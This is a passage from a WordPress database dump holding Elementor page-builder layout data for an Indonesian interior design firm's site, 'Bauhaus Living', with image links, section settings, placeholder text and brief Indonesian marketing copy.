left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4288,4930,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4289,4930,'_elementor_pro_version','3.8.1'),(4290,4931,'_wp_page_template','elementor_header_footer'),(4291,4931,'_elementor_edit_mode','builder'),(4292,4931,'_elementor_template_type','wp-page'),(4293,4931,'_elementor_version','3.8.1'),(4294,4931,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked